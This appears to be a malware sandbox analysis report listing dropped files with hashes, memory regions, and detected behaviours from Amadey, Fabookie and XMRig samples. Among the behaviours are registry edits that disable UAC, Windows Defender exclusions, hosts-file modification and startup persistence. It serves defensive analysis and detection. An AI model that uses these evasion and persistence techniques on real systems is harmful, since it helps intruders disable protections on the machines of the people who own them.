\Users\Admin\Pictures\Y4cHvpq7IICxYtIKU0BzrBsn.exe

MD5 823b5fcdef282c5318b670008b9e6922
SHA1 d20cd5321d8a3d423af4c6dabc0ac905796bdc6d
SHA256 712f5bb403ca4ade2d3fa47b050aac51a9f573142fd8ba8bf18f5f8144214d8d
SHA512 4377d06a71291be3e52c28a2ada0b89ff185a8887c4a75972cdc5e85d95da6538d1776bc49fb190c67b8e6497225f1d63b86793f4095c8fb990a5f6659216472

memory/2408-291-0x0000000004660000-0x00000000046A0000-memory.dmp

C:\Users\Admin\Pictures\Y4cHvpq7IICxYtIKU0BzrBsn.exe

MD5 823b5fcdef282c5318b670008b9e6922
SHA1 d20cd5321d8a3d423af4c6dabc0ac905796bdc6d
SHA256 712f5bb403ca4ade2d3fa47b050aac51a9f573142fd8ba8bf18f5f8144214d8d
SHA512 4377d06a71291be3e52c28a2ada0b89ff185a8887c4a75972cdc5e85d95da6538d1776bc49fb190c67b8e6497225f1d63b86793f4095c8fb990a5f6659216472

memory/2144-308-0x00000000009B0000-0x0000000000CCC000-memory.dmp

memory/2144-309-0x0000000074000000-0x00000000746EE000-memory.dmp

\Users\Admin\Pictures\QP72Zw6573wQr3Slm5KXvswp.exe

MD5 6e45986a505bed78232a8867b5860ea6
SHA1 51b142a7e60eecd73c3eaa143eadda4b7e64ac4c
SHA256 c957aa07aa1dd6d58aff2431b56b2139a0c2d5d6b34d20a978767e0daab58829
SHA512 d2d8bc6179795c1c255ec5ac16817f83ff97fcd90481dbe2325a351b448c48a83af03f22ff6dda0cb6ad2401c20b81d2871068aa9e32d2747cc2f5669b440fde

\Users\Admin\AppData\Local\Temp\is-61RGG.tmp\YWjpdLRkE9QOyniJrKs0TD5A.tmp

MD5 83827c13d95750c766e5bd293469a7f8
SHA1 d21b45e9c672d0f85b8b451ee0e824567bb23f91
SHA256 8bd7e6b4a6be9f3887ac6439e97d3d3c8aaa27211d02ecbd925ab1df39afe7ae
SHA512 cdbdd93fc637772b12bdedb59c4fb72a291da61e8c6b0061ad2f9448e8c949543f003646b1f5ce3e1e3aebc12de27409ddd76d3874b8f4f098163a1ff328b6f0

C:\Users\Admin\Pictures\QP72Zw6573wQr3Slm5KXvswp.exe

MD5 6e45986a505bed78232a8867b5860ea6
SHA1 51b142a7e60eecd73c3eaa143eadda4b7e64ac4c
SHA256 c957aa07aa1dd6d58aff2431b56b2139a0c2d5d6b34d20a978767e0daab58829
SHA512 d2d8bc6179795c1c255ec5ac16817f83ff97fcd90481dbe2325a351b448c48a83af03f22ff6dda0cb6ad2401c20b81d2871068aa9e32d2747cc2f5669b440fde

memory/2352-334-0x00000000FF7C0000-0x00000000FF8AC000-memory.dmp

\Users\Admin\Pictures\7teO0rPM7jsu93TnUxWpIf79.exe

MD5 b68feec717f5a72bbb97c92d76ba8ae2
SHA1 2a7f758345bb7029f711cc239ab11c9d97c5ce2e
SHA256 27d70a3460277e9b288d645f3b986bb9bb5da4ef171e8b5e0f673376d0e7a6be
SHA512 128b80c8e840f2ad0b375bb4de948a0325c3f0edc8bf3056d8b748667ae8dc91d8a7aeff7d8656edffc66ac81389ffcc952124e874470be22e9e473c0f6565fe

C:\Users\Admin\Pictures\7teO0rPM7jsu93TnUxWpIf79.exe

MD5 b68feec717f5a72bbb97c92d76ba8ae2
SHA1 2a7f758345bb7029f711cc239ab11c9d97c5ce2e
SHA256 27d70a3460277e9b288d645f3b986bb9bb5da4ef171e8b5e0f673376d0e7a6be
SHA512 128b80c8e840f2ad0b375bb4de948a0325c3f0edc8bf3056d8b748667ae8dc91d8a7aeff7d8656edffc66ac81389ffcc952124e874470be22e9e473c0f6565fe

\Users\Admin\AppData\Local\Temp\is-P6IU7.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

memory/2276-354-0x00000000001D0000-0x00000000001D1000-memory.dmp

memory/2016-342-0x0000000002930000-0x0000000002D28000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-P6IU7.tmp\idp.dll

MD5 8f995688085bced38ba7795f60a5e1d3
SHA1 5b1ad67a149c05c50d6e388527af5c8a0af4343a
SHA256 203d7b61eac96de865ab3b586160e72c78d93ab5532b13d50ef27174126fd006
SHA512 043d41947ab69fc9297dcb5ad238acc2c35250d1172869945ed1a56894c10f93855f0210cbca41ceee9efb55fd56a35a4ec03c77e252409edc64bfb5fb821c35

C:\Users\Admin\AppData\Local\Temp\is-61RGG.tmp\YWjpdLRkE9QOyniJrKs0TD5A.tmp

MD5 83827c13d95750c766e5bd293469a7f8
SHA1 d21b45e9c672d0f85b8b451ee0e824567bb23f91
SHA256 8bd7e6b4a6be9f3887ac6439e97d3d3c8aaa27211d02ecbd925ab1df39afe7ae
SHA512 cdbdd93fc637772b12bdedb59c4fb72a291da61e8c6b0061ad2f9448e8c949543f003646b1f5ce3e1e3aebc12de27409ddd76d3874b8f4f098163a1ff328b6f0

memory/2408-358-0x00000000075C0000-0x0000000007B0D000-memory.dmp

memory/2144-359-0x0000000005C20000-0x0000000005C60000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b882308fbf3c5fc705d5f58bcfa19c46
SHA1 f7516182930026a7f3bdb767a1a28bc6b79980fc
SHA256 a29a0481375af1ef73aff05201cabcdfae4705200727695b473073a9508a7a74
SHA512 74b3d1e6226fdf7247da3f141fc4083036194d5f7980261d4d88e8f1204be51e267dde9d6c6d115fb4b6b695ed2aaf99b9318d6531ac30f30444c5a0a0d94313

memory/2152-390-0x0000000000400000-0x000000000046A000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\513876443277

MD5 356b3305d25016cea3cdb630df29dcd1
SHA1 ada617e162c27c5afe55fed61bde337e8b8fafa5
SHA256 9e1cd9ed0044f7e13495edbacf768c26765d033b701635b2d9b8d8708a213859
SHA512 8e110dcc84e3f3499844091b53f624e4fac55b48c4d7ddb6317be0c4693bfd208872c103cfa3c9380f6c4317887d628a7b085c7b68810c99b0082c60f7f3fbb1

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 d2ff8f5e7a0d4f149833138af126e805
SHA1 369c345cb39c2c04482126a65a5e4e9654cbea20
SHA256 f84e9009d33d50e8ad9d72da3c748a9a306201f230988d44c39bbceace78ab71
SHA512 e5bcb3d61f191921e1cdea7d96f12423eb6a25ddb8641d229598da4dff037a8b615af8d84a859a0a38a6a962b85fb21479bcd5c8c79dc66899a66fd5bacc7a4d

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751

MD5 4767cff19b3fa365fad77a41dcb3dd77
SHA1 7e755e1025f2db292d5a1b117ac68afb533188cc
SHA256 61fa774b10c34feccf8199c43e2817a13634ad659e00a0ab19a9e0fd9df3eb78
SHA512 07978c8e0459f9e57177823278dc6665f16df222524b68d429d53b6a0d21de8a5755876f3598eb82b75001f575d4faf5c02f14b28dbfbed342e2579284a03170

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751

MD5 60fe01df86be2e5331b0cdbe86165686
SHA1 2a79f9713c3f192862ff80508062e64e8e0b29bd
SHA256 c08ccbc876cd5a7cdfa9670f9637da57f6a1282198a9bc71fc7d7247a6e5b7a8
SHA512 ef9f9a4dedcbfe339f4f3d07fb614645596c6f2b15608bdccdad492578b735f7cb075bdaa07178c764582ee345857ec4665f90342694e6a60786bb3d9b3a3d23

memory/1580-409-0x000000013FAB0000-0x000000013FFF3000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 f82c338c005db1bfbb463497d2c11ff1
SHA1 d033825344ae304d0d8fb744eef130f4bc5b95ae
SHA256 b4b52d036e84b78ead5e3fbbb3d534aee216bcfa63e765d997394af4a5df6c59
SHA512 d7bdc2baccae1b2efb22e4c274277ab087ab62213eac325501ff5a9d43099bbbba3da18d03b3ba0234e2911d8b9e6d0f193690cfaa550edcfdc3652b45729eb6

memory/2144-423-0x0000000005C20000-0x0000000005C60000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 4d871c70659195e2995ea96a791c2fb8
SHA1 081a9f32a3d3f4ebeb539833c7b32521bf3b52fc
SHA256 58799b32080f531a916b126dfb571aa5a65b1caf4e18c4b01940d9d11c53638a
SHA512 b6c6803b43cbd95dfe1d0b2f7655a3dcdfe4ec8a83a141af0d3b059b1116d98be7e7357fa8555ee9bf663736a65ad9a1045153696de476e5d6450946f402df76

\Users\Admin\AppData\Local\Temp\is-P6IU7.tmp\8758677____.exe

MD5 65e5ccda7c002e24eb090ad1c9602b0f
SHA1 2daf02ebb81660eb07cff159d9bdfd7f544c2c13
SHA256 a29e50e997346fe1b47d0c93aafc4d9e08642c199d8ec1ef79f6d09e1618c439
SHA512 c46f1eb108b79011f63ca7907e8536e78034d1be26510b9cf0ffd4b69d46adcd084467bfb1419e7e069cda27d5e61b65092d58bec7c44c4939058ab75482525e

C:\Users\Admin\AppData\Local\Temp\is-P6IU7.tmp\8758677____.exe

MD5 65e5ccda7c002e24eb090ad1c9602b0f
SHA1 2daf02ebb81660eb07cff159d9bdfd7f544c2c13
SHA256 a29e50e997346fe1b47d0c93aafc4d9e08642c199d8ec1ef79f6d09e1618c439
SHA512 c46f1eb108b79011f63ca7907e8536e78034d1be26510b9cf0ffd4b69d46adcd084467bfb1419e7e069cda27d5e61b65092d58bec7c44c4939058ab75482525e

memory/2976-444-0x0000000000DB0000-0x0000000000E34000-memory.dmp

memory/2976-445-0x000007FEF5450000-0x000007FEF5E3C000-memory.dmp

memory/2144-446-0x0000000074000000-0x00000000746EE000-memory.dmp

memory/2976-447-0x0000000000240000-0x00000000002A2000-memory.dmp

memory/2976-448-0x000000001B000000-0x000000001B080000-memory.dmp

memory/2352-451-0x00000000032B0000-0x0000000003421000-memory.dmp

memory/2352-452-0x0000000002F40000-0x0000000003071000-memory.dmp

memory/2976-453-0x00000000024A0000-0x00000000024FE000-memory.dmp

memory/2276-454-0x0000000000400000-0x0000000000513000-memory.dmp

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 b6ae0eef6333fbf02caa2aff1f039f0d
SHA1 0bc43e76da64a2830bd0f7c50730350921175d24
SHA256 d16e70ee5557495181da67ba2709ac8e153a6e859f2cbb4f7779b51a9a7ef771
SHA512 6e981e063e71d17d0af16aee5598bd17975c6976db8911fedcef4a2114cb066f90791fe8c266d7fbb1b25ff047267c4fcd218f132038daa8f493c6ea48d87ae0

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

MD5 f0f76a1af2e18c54a3eafaa7b8d746cb
SHA1 fa360ecafc7f24f5228602570ccd08daf124164e
SHA256 e9804ae8575f88ad574f50cf9d6d54bcfcf70893b70da316de549a4745dee94e
SHA512 79a043b714d10697c5f52e700418eab61785c0c68281975c9c969ab3191f8983610518f56e446ec1f81b00f00f61a7b8789af42759654f2f265482fe6e91bac1

\Users\Admin\Pictures\Opera_installer_2310050832190201748.dll

MD5 e23e7fc90656694198494310a901921a
SHA1 341540eaf106932d51a3ac56cb07eeb6924f5ebd
SHA256 bf1aa65c0b76c41f6c27c89a527720958505e5568a63a7530494fb89e8fdcf75
SHA512 d0a437dac1af3587bc85a075d2ec3cf6e6cc23cdb6f4adfe8e87502c39c91807e7833b42aca63a85c0d329de89e348f71700b0ba9fca37fdf167f8b8ec25cf2d

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\2G4TRZRLJFBZEL5VI6B5.temp

MD5 e22ada5183e1b100bcec0b82fd60149a
SHA1 d606ac4f834915662caeb74a93df52a857c382f7
SHA256 6109c49f702d7f05f9879f98d3207015fe1d5d00defe57f1f035f4107fe84cc1
SHA512 d036dfb368158e12feca4ca64a44fda84ce68e1bbfc7fcf7068a1dffeadd0b15880e85f3d308245b9173691446cf22a0a90ba25076d4b80a55ba8bf935647b2a

memory/2144-496-0x0000000005C20000-0x0000000005C60000-memory.dmp

memory/2524-497-0x000000001B300000-0x000000001B5E2000-memory.dmp

memory/2524-499-0x00000000023D0000-0x00000000023D8000-memory.dmp

memory/2524-500-0x00000000026D0000-0x0000000002750000-memory.dmp

memory/2524-498-0x000007FEEE560000-0x000007FEEEEFD000-memory.dmp

memory/2524-501-0x000007FEEE560000-0x000007FEEEEFD000-memory.dmp

memory/2524-502-0x00000000026D0000-0x0000000002750000-memory.dmp

memory/2524-503-0x00000000026D0000-0x0000000002750000-memory.dmp

memory/2144-504-0x0000000005C20000-0x0000000005C60000-memory.dmp

memory/2524-505-0x00000000026D0000-0x0000000002750000-memory.dmp

memory/2524-506-0x000007FEEE560000-0x000007FEEEEFD000-memory.dmp

memory/524-508-0x0000000000400000-0x00000000005B9000-memory.dmp

memory/2976-509-0x000007FEF5450000-0x000007FEF5E3C000-memory.dmp

memory/524-510-0x00000000006E0000-0x00000000007E0000-memory.dmp

memory/524-511-0x0000000000220000-0x000000000025E000-memory.dmp

memory/524-519-0x0000000000400000-0x00000000005B9000-memory.dmp

memory/2976-536-0x000000001B000000-0x000000001B080000-memory.dmp

memory/1580-543-0x000000013FAB0000-0x000000013FFF3000-memory.dmp

memory/2352-544-0x0000000002F40000-0x0000000003071000-memory.dmp

memory/2156-548-0x0000000002820000-0x0000000002C18000-memory.dmp

memory/2156-552-0x0000000002C20000-0x000000000350B000-memory.dmp

memory/2156-554-0x0000000000400000-0x0000000000D62000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\86-c8cce-399-5d4b1-136a4af5eeca1\Gegiwavuty.exe

MD5 12b9ea8a702a9737e186f8057c5b4a3a
SHA1 4184e9decf6bbc584a822098249e905644c4def2
SHA256 0ede12df938accd1be25420696db2969815ca0a2cd22d0c68a3352faa88f1001
SHA512 f62f17cddde83b96e416a198abde4ece29f6e26bc95ee72f151ab05594859a1cf69afb918f4f1a0ef5d6a660b2d2cead419f9b396698512a8d32bb877ce50713

C:\Users\Admin\AppData\Local\Temp\86-c8cce-399-5d4b1-136a4af5eeca1\Gegiwavuty.exe.config

MD5 98d2687aec923f98c37f7cda8de0eb19
SHA1 f6dcfcdcfe570340ecdbbd9e2a61f3cb4f281ba7
SHA256 8a94163256a722ef8cc140bcd115a5b8f8725c04fe158b129d47be81cb693465
SHA512 95c7290d59749df8df495e04789c1793265e0f34e0d091df5c0d4aefe1af4c8ac1f5460f1f198fc28c4c8c900827b8f22e2851957bbaea5914ea962b3a1d0590

memory/3008-562-0x000000006D110000-0x000000006D6BB000-memory.dmp

memory/3008-563-0x0000000000730000-0x0000000000770000-memory.dmp

C:\Program Files\Mozilla Firefox\DUKDYCZTYG\lightcleaner.exe

MD5 f8c7c7d63fe2d74fa007ace2598ff9cb
SHA1 23412ed810c3830ca9bab8cd25c61cf7d70d0b5a
SHA256 fd02825ce17effb7d70ca2e9907647128241610bb1dce11a70f6f1a19d052047
SHA512 0dfb9bcd6dd8ce3f561b885989ae4c2e78c33f110aa1bf48c4c42c467db672af422ebdbf2ef66fe6f2e21307c036fbfa885e58fc3c4fa1f9677139e818855258

memory/3008-566-0x000000006D110000-0x000000006D6BB000-memory.dmp

memory/1904-569-0x0000000000400000-0x0000000000414000-memory.dmp

\Users\Admin\AppData\Local\Temp\86-c8cce-399-5d4b1-136a4af5eeca1\Gegiwavuty.exe

MD5 12b9ea8a702a9737e186f8057c5b4a3a
SHA1 4184e9decf6bbc584a822098249e905644c4def2
SHA256 0ede12df938accd1be25420696db2969815ca0a2cd22d0c68a3352faa88f1001
SHA512 f62f17cddde83b96e416a198abde4ece29f6e26bc95ee72f151ab05594859a1cf69afb918f4f1a0ef5d6a660b2d2cead419f9b396698512a8d32bb877ce50713

memory/2016-576-0x0000000002930000-0x0000000002D28000-memory.dmp

memory/524-582-0x00000000006E0000-0x00000000007E0000-memory.dmp

\Users\Admin\AppData\Local\Temp\is-21URI.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

C:\Users\Admin\AppData\Local\Temp\is-21URI.tmp\_isetup\_shfoldr.dll

MD5 92dc6ef532fbb4a5c3201469a5b5eb63
SHA1 3e89ff837147c16b4e41c30d6c796374e0b8e62c
SHA256 9884e9d1b4f8a873ccbd81f8ad0ae257776d2348d027d811a56475e028360d87
SHA512 9908e573921d5dbc3454a1c0a6c969ab8a81cc2e8b5385391d46b1a738fb06a76aa3282e0e58d0d2ffa6f27c85668cd5178e1500b8a39b1bbae04366ae6a86d3

C:\Users\Admin\AppData\Local\Temp\xyvvnnvseiqa.xml

MD5 546d67a48ff2bf7682cea9fac07b942e
SHA1 a2cb3a9a97fd935b5e62d4c29b3e2c5ab7d5fc90
SHA256 eff7edc19e6c430aaeca7ea8a77251c74d1e9abb79b183a9ee1f58c2934b4b6a
SHA512 10d90edf31c0955bcec52219d854952fd38768bd97e8e50d32a1237bccaf1a5eb9f824da0f81a7812e0ce62c0464168dd0201d1c0eb61b9fe253fe7c89de05fe

C:\Users\Admin\AppData\Local\Temp\is-14UJ4.tmp\lightcleaner.tmp

MD5 7bf46cc89fa0ea81ece9fc0eb9d38807
SHA1 803040acb0d2dda44091c23416586aaeeed04e4a
SHA256 31793ff8cdff66c5eb829ff1637d12b7afebd5fc95794946baccb6e96bf54649
SHA512 371c053ae2e4a0ab530b597c5cb9e07a35b9b391b79afa06b9c7bc3b4c172e8ffbd83aefd931c5eb39c9a4e8c991f74dfff94eb9014be5cb9af3edef7a335d41

\Users\Admin\AppData\Local\Temp\is-14UJ4.tmp\lightcleaner.tmp

MD5 7bf46cc89fa0ea81ece9fc0eb9d38807
SHA1 803040acb0d2dda44091c23416586aaeeed04e4a
SHA256 31793ff8cdff66c5eb829ff1637d12b7afebd5fc95794946baccb6e96bf54649
SHA512 371c053ae2e4a0ab530b597c5cb9e07a35b9b391b79afa06b9c7bc3b4c172e8ffbd83aefd931c5eb39c9a4e8c991f74dfff94eb9014be5cb9af3edef7a335d41

memory/3020-581-0x0000000000400000-0x00000000005C2000-memory.dmp

memory/3020-580-0x0000000000250000-0x00000000002A1000-memory.dmp

memory/3020-579-0x0000000000780000-0x0000000000880000-memory.dmp

\Program Files (x86)\LightCleaner\LightCleaner.exe

MD5 b1c46e53e92ce5c1b673a60b2db081ac
SHA1 6ef5e9f1ee2f0a325c43c2d92447310097f9f5b3
SHA256 ef4b529c5f506bf8a58522aed1e5ae7ebfec2155130e90bd92f9403883046489
SHA512 a6708c915b68cabc62b8a356c91e1e4d8facd5b5c28050d39dd8c0486d0e84440d6f75b4bdd78c348d44138a1686b152f6042fdaae0f5d0fce3a31aa5b9b46a5

memory/3000-691-0x0000000000400000-0x00000000004BD000-memory.dmp

memory/2016-577-0x0000000000400000-0x0000000000D62000-memory.dmp

memory/1904-731-0x0000000000400000-0x0000000000414000-memory.dmp

memory/1580-767-0x000000013FAB0000-0x000000013FFF3000-memory.dmp

C:\Program Files\Google\Chrome\updater.exe

MD5 7af78ecfa55e8aeb8b699076266f7bcf
SHA1 432c9deb88d92ae86c55de81af26527d7d1af673
SHA256 f7284ade2ca0aeb432cf1fdae5ab0c724f81d10b914f6d4c2c15ef0f60ff316e
SHA512 3c0ae6b6e4a896da52faff4fb2e958abb2856330cbba6ff4b7a59e7512475e1739cccf2cfda7dde492f381d3225263bc77e3154983e86933fa074696e92a059e

memory/2276-774-0x0000000000400000-0x0000000000513000-memory.dmp

memory/2152-778-0x0000000000400000-0x000000000046A000-memory.dmp

memory/2016-794-0x0000000000400000-0x0000000000D62000-memory.dmp

memory/2156-835-0x0000000000400000-0x0000000000D62000-memory.dmp

memory/3020-837-0x0000000061E00000-0x0000000061EF3000-memory.dmp

memory/3020-838-0x0000000000400000-0x00000000005C2000-memory.dmp

memory/1748-858-0x00000000003E0000-0x000000000092D000-memory.dmp

memory/2956-870-0x0000000002220000-0x0000000002684000-memory.dmp

memory/524-872-0x0000000000400000-0x00000000005B9000-memory.dmp

memory/2016-873-0x0000000000400000-0x0000000000D62000-memory.dmp

memory/1308-874-0x000000013F280000-0x000000013F7C3000-memory.dmp

memory/2156-876-0x0000000000400000-0x0000000000D62000-memory.dmp

memory/2944-877-0x0000000002640000-0x0000000002A38000-memory.dmp

memory/2156-879-0x0000000000400000-0x0000000000D62000-memory.dmp

memory/2016-880-0x0000000000400000-0x0000000000D62000-memory.dmp

memory/1668-881-0x0000000002630000-0x0000000002A28000-memory.dmp

memory/1308-883-0x000000013F280000-0x000000013F7C3000-memory.dmp

memory/2956-893-0x0000000000400000-0x0000000000A00000-memory.dmp

C:\Users\Admin\AppData\Roaming\a967e0f403b652\cred64.dll

MD5 4bd56443d35c388dbeabd8357c73c67d
SHA1 26248ce8165b788e2964b89d54d1f1125facf8f9
SHA256 021882d0f0cdc7275247b2ef6cc02a28cf0f02971de5b9afa947ffe7b63fb867
SHA512 100dc81a0d74725d74ed3801d7828c53c36315179427e88404cb482f83afc0e8766fd86642b4396b37dd7e3262d66d7138c8b4a175354af98254869fbdd43192

memory/1308-910-0x000000013F280000-0x000000013F7C3000-memory.dmp

C:\Users\Admin\AppData\Roaming\a967e0f403b652\clip64.dll

MD5 49b3faf5b84f179885b1520ffa3ef3da
SHA1 c1ac12aeca413ec45a4f09aa66f0721b4f80413e
SHA256 b89189d3fca0a41aee9d4582a8efbe820d49e87224c325b4a0f4806d96bf86a5
SHA512 018d531b3328267ecaebcb9f523c386c8aa36bf29e7b2e0f61bd96a0f7f2d03c7f25f878c373fbce7e44c8d5512e969b816ed9c72edb44afa302670c652de742

C:\Users\Admin\AppData\Local\Temp\86-c8cce-399-5d4b1-136a4af5eeca1\Kenessey.txt

MD5 97384261b8bbf966df16e5ad509922db
SHA1 2fc42d37fee2c81d767e09fb298b70c748940f86
SHA256 9c0d294c05fc1d88d698034609bb81c0c69196327594e4c69d2915c80fd9850c
SHA512 b77fe2d86fbc5bd116d6a073eb447e76a74add3fa0d0b801f97535963241be3cdce1dbcaed603b78f020d0845b2d4bfc892ceb2a7d1c8f1d98abc4812ef5af21

C:\ProgramData\Microsoft\Assistance\Client\1.0\en-US\Help_MTOC_help.H1H

MD5 bca5375a8458228efd7e104d20e9b18d
SHA1 cf9454bf2880fde5a7d5be78e0000362e3e304ba
SHA256 656a2dc387ed866c3dd181e30e06687332c7ed40873e4b5359a3bf30db1fbbf8
SHA512 e2e365d66738c4968b8e79f66acd80906ed69a48e9044f252773a35f5c79f73a8949b93ada7738009b2e01b97fa6537d54144279175c055591b18da1a0391515

memory/2944-967-0x0000000000400000-0x0000000000D62000-memory.dmp

memory/2956-970-0x0000000000400000-0x0000000000A00000-memory.dmp

memory/1668-971-0x0000000000400000-0x0000000000D62000-memory.dmp

memory/2956-972-0x0000000003490000-0x0000000003C82000-memory.dmp

memory/1308-973-0x000000013F280000-0x000000013F7C3000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted 2023-10-05 08:31

Reported 2023-10-05 08:34

Platform win10v2004-20230915-en

Max time kernel 66s

Max time network 152s

Command Line

C:\Windows\Explorer.EXE

Signatures

Amadey

trojan amadey

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

UAC bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Windows\SysWOW64\cacls.exe N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Users\Admin\AppData\Local\Temp\file.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\file.exe = "0" C:\Users\Admin\AppData\Local\Temp\file.exe N/A

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Drops file in Drivers directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\drivers\etc\hosts C:\Users\Admin\AppData\Local\Temp\is-T9T6K.tmp\8758677____.exe N/A

Stops running service(s)

evasion

.NET Reactor protector

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\is-T9T6K.tmp\8758677____.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2890696111-2332180956-3312704074-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Pictures\v7U1rsyyAysLqRY9bnLCtkoY.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\mr2v54rRyCygPO8QL4Lf4JFs.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\aZn0sgOaQoyUgNHagt3UZ2En.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\yzdpUzfhU9d2TVgTF5FoXtOl.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\FuDSSTop9aTNzLPoPAG28RMY.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Am9xT4BYi1Jd5dzawQQtaxBk.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\b7rbp88HUZY8kJ0XvF5Iwa2j.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Wp9sqY4idBTVK7wKjRciwADk.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\fPSh7m8vjpG3bsIfrXAlCBga.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9AKZzdqLT6PXw7pctOcyfYrU.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jMm5sVd3PSzQImKdmPyizJ67.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\PsoOdxuEl2SRE1qAgpeQQc0M.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\wpVjJTY5pgo9wKzgerQ9CsLa.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\P5lS5TJec1ParZK3GUMNueoe.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\v7U1rsyyAysLqRY9bnLCtkoY.exe N/A
N/A N/A C:\Users\Admin\Pictures\jULbrBYpeg0IXpoPMkqW0pF3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\1ff8bec27e\nhdues.exe N/A
N/A N/A C:\Users\Admin\Pictures\m31LgvCFpYcGTqyl0xZuNrNV.exe N/A
N/A N/A C:\Users\Admin\Pictures\T37Q9QlEWwcqVX2PjlRMWiEm.exe N/A
